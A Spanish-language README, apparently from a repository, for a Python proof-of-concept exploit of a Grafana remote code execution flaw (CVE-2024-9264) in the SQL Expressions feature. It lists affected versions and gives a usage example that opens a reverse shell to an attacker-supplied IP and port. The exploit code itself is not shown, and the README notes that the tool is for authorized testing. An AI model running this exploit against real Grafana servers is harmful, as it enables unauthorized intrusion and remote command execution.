
Prueba de concepto en Python para la ejecución remota de código en Grafana mediante expresiones SQL, que explota una sanitización insuficiente de entradas para ejecutar comandos arbitrarios del shell en objetivos autenticados.
Prueba de Concepto para Ejecución Remota de Código en Grafana (CVE-2024-9264)
Este repositorio contiene un script de Python que explota una vulnerabilidad de Ejecución Remota de Código (RCE) en la función de Expresiones SQL de Grafana. Al aprovechar una sanitización insuficiente de las entradas, este exploit permite a un atacante ejecutar comandos de shell arbitrarios en el servidor. Esto es posible a través de la extensión comunitaria shellfs, que un atacante puede instalar y cargar para facilitar la ejecución de comandos.
Viewer o superioresGrafana >= v11.0.0 (todas las v11.x.y están afectadas)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
Este script tiene fines educativos y está destinado a ser utilizado en entornos controlados donde tengas permiso para probar la seguridad del sistema. El mal uso de esta herramienta podría tener consecuencias legales.